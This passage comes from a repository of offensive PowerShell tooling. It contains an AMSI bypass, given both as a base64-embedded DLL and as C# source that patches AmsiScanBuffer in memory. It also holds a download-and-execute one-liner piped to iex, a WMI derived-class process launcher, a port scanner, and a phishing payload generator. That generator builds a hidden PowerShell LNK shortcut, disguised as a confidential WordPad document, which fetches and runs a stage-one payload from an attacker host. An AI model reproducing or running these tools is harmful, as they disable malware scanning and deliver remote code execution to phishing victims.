[Reflection.Assembly]::Load([Convert]::FromBase64String("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N0RBQ0VEAEJ5cGFzc0FNU0kAbXNjb3JsaWIAc3JjAERpc2FibGUAUnVudGltZUZpZWxkSGFuZGxlAENvbnNvbGUAaE1vZHVsZQBwcm9jTmFtZQBuYW1lAFdyaXRlTGluZQBWYWx1ZVR5cGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAQnl0ZQBkd1NpemUAc2l6ZQBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAEFsbG9jSEdsb2JhbABNYXJzaGFsAEtlcm5lbDMyLmRsbABCeXBhc3NBTVNJLmRsbABTeXN0ZW0AU3lzdGVtLlJlZmxlY3Rpb24Ab3BfQWRkaXRpb24AWmVybwAuY3RvcgBVSW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBSdW50aW1lSGVscGVycwBCeXBhc3MAR2V0UHJvY0FkZHJlc3MAbHBBZGRyZXNzAE9iamVjdABscGZsT2xkUHJvdGVjdABWaXJ0dWFsUHJvdGVjdABmbE5ld1Byb3RlY3QAb3BfRXhwbGljaXQAZGVzdABJbml0aWFsaXplQXJyYXkAQ29weQBMb2FkTGlicmFyeQBSdGxNb3ZlTWVtb3J5AG9w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")) | Out-Null 120 | Write-Output "DLL has been reflected"; 121 | } 122 | [Bypass.AMSI]::Disable() 123 | 124 | # 125 | # You can put malicious powershell here to execute-it when Bypass-AMSI function is triggered 126 | # -> in case of msfvenom usage : use psh-net as format 127 | # -> customize the PowerShell code in order to bypass A.V detection (or use other tools such like unicorn) 128 | } 129 | 130 | ###################################################################################################################################### 131 | [**] update 08/01/2019 from rasta-mouse's AmsiScanBufferBypass project (https://rastamouse.me/2018/12/amsiscanbuffer-bypass-part-4/): 132 | ###################################################################################################################################### 133 | $Ref = ( 134 | "System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", 135 | "System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" 136 | ) 137 | 138 | $Source = @" 139 | using System; 140 | using System.Runtime.InteropServices; 141 | 142 | namespace Bypass 143 | { 144 | public class AMSI 145 | { 146 | [DllImport("kernel32")] 147 | public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); 148 | [DllImport("kernel32")] 149 | public static extern IntPtr LoadLibrary(string name); 150 | [DllImport("kernel32")] 151 | public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 152 | 153 | [DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)] 154 | static extern void MoveMemory(IntPtr dest, IntPtr src, int size); 155 | 156 | public static int Disable() 157 | { 158 | IntPtr TargetDLL = LoadLibrary("amsi.dll"); 159 | if (TargetDLL == IntPtr.Zero) { return 1; } 160 | 161 | IntPtr ASBPtr = GetProcAddress(TargetDLL, "Amsi" + "Scan" + "Buffer"); 162 | if (ASBPtr == IntPtr.Zero) { return 1; } 163 | 164 | UIntPtr dwSize = (UIntPtr)5; 165 | uint Zero = 0; 166 | 167 | if (!VirtualProtect(ASBPtr, dwSize, 0x40, out Zero)) { return 1; } 168 | 169 | Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; 170 | IntPtr unmanagedPointer = Marshal.AllocHGlobal(6); 171 | Marshal.Copy(Patch, 0, unmanagedPointer, 6); 172 | MoveMemory(ASBPtr, unmanagedPointer, 6); 173 | 174 | return 0; 175 | } 176 | } 177 | } 178 | "@ 179 | 180 | Add-Type -ReferencedAssemblies $Ref -TypeDefinition $Source -Language CSharp 181 | 182 | [+] Usage: 183 | PS C:\Users\jmbourbon\Desktop\R&D> . .\amsi-bypass.ps1 184 | PS C:\Users\jmbourbon\Desktop\R&D> [Bypass.AMSI]::Disable() 185 | 0 186 | 187 | PS C:\Users\jmbourbon\Desktop\R&D> "AmsiScanBuffer" 188 | AmsiScanBuffer 189 | 190 | #> 191 | -------------------------------------------------------------------------------- /base64-encode.ps1: -------------------------------------------------------------------------------- 1 | # B64 Ecoding: 2 | $Base64 = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes([System.IO.File]::ReadAllText("C:\Users\jmbourbon\Desktop\TOOLS\PowerShell\amsi-bypass.ps1"))) 3 | Write-Output $Base64| Out-File "payload-b64" 4 | 5 | # B64 Decoding: 6 | $bytes = [Convert]::FromBase64String($Base64) 7 | [IO.File]::WriteAllBytes("C:\Users\jmbourbon\Desktop\TOOLS\PowerShell\payload-b64-decoded", $bytes) 8 | 9 | # Then host the b64 file and iwr (Invoke-WebRequest) or wget it (shortest way): 10 | powershell "wget 192.168.1.1/f|iex" 11 | -------------------------------------------------------------------------------- /class-derivation.ps1: -------------------------------------------------------------------------------- 1 | $C = [WmiClass] '/root/cimv2:Win32_Process' 2 | $N = $C.derive('MyEvilProcess') 3 | $N.Put() 4 | Write-Output $N 5 | Invoke-WmiMethod MyEvilProcess -Name CrEaTe -ArgumentList calc.exe -------------------------------------------------------------------------------- /multi-host-port-scan.ps1: -------------------------------------------------------------------------------- 1 | 2 | #usage: 3 | 4 | #[ ] PS> .\script.ps1 hostlist.txt portlist.txt 5 | 6 | 7 | param([string]$list1,[string]$list2) 8 | if ($list1 -eq ""){ 9 | Write-Host "Please supply Host-list!!" -ForegroundColor Red 10 | break 11 | } 12 | If ($list2 -eq ""){ 13 | Write-Host "Please supply Port-List!!" -ForegroundColor Red 14 | break 15 | } 16 | [Array]$hostlist = Get-Content $list1 17 | [Array]$ports = Get-Content $list2 18 | $ErrorActionPreference = "SilentlyContinue" 19 | $ping = new-object System.Net.NetworkInformation.Ping 20 | foreach ($ip in $hostlist) { 21 | $rslt = $ping.send($ip) 22 | if (! $?){ 23 | Write-Host "Host: $ip - not found" -ForegroundColor Red 24 | } 25 | else { 26 | if ($rslt.status.tostring() –eq “Success”) { 27 | write-host "Host: $ip - Ports: " -foregroundColor Green -NoNewline 28 | foreach ($port in $ports){ 29 | $socket = new-object System.Net.Sockets.TcpClient($ip, $port) 30 | if ($socket –eq $null) { 31 | write-host "$port," -ForegroundColor Red -NoNewline 32 | } 33 | else { 34 | write-host "$port,"-foregroundcolor Green -NoNewline 35 | $socket = $null 36 | } 37 | } 38 | } 39 | else { 40 | write-host "Host: $ip - down" -ForegroundColor Red 41 | } 42 | } 43 | Write-Host "" 44 | } 45 | $ping = $null 46 | -------------------------------------------------------------------------------- /ole-payload-generator.ps1: -------------------------------------------------------------------------------- 1 | # - Original script: https://ired.team/offensive-security/initial-access/phishing-with-ms-office/phishing-ole-+-lnk 2 | 3 | # UserAgent Randomization : 4 | $browsers = @('Firefox','Chrome','InternetExplorer','Opera','Safari') 5 | $browsertype = Get-Random -InputObject $browsers 6 | $UA = [Microsoft.PowerShell.Commands.PSUserAgent]::$browsertype 7 | 8 | # Payload (containing both stage 1 and stage 2) : 9 | $ProxyAware = "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials" 10 | $Payload = "$ProxyAware;iwr https://evil-attacker.lol/stage1 -UserAgent '$UA'|iex" 11 | 12 | Write-Output "`n[*] Clear text payload: $Payload" 13 | 14 | $Dump = [System.Text.Encoding]::Unicode.GetBytes($Payload) 15 | $EncodedPayload = [Convert]::ToBase64String($Dump) 16 | 17 | Write-Output "-----------------------" 18 | Write-Output "`n[*] Encoded payload: $EncodedPayload `n" 19 | 20 | 21 | $obj = New-object -comobject wscript.shell 22 | $filename=Get-Random -Minimum 1 -Maximum 100 23 | $shortcut = "C:\Users\tata\Desktop\Confidential-$filename.lnk" 24 | 25 | $link = $obj.createshortcut($shortcut) 26 | $link.windowstyle = "7" 27 | $link.targetpath = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 28 | $link.iconlocation = "C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe" 29 | $link.arguments = "-Nop -sta -noni -w hidden -ec $EncodedPayload" 30 | $link.save() 31 | 32 | Write-Output "-----------------------" 33 | Write-Output "`n`n[*] Payload generated in $shortcut !`n" 34 | --------------------------------------------------------------------------------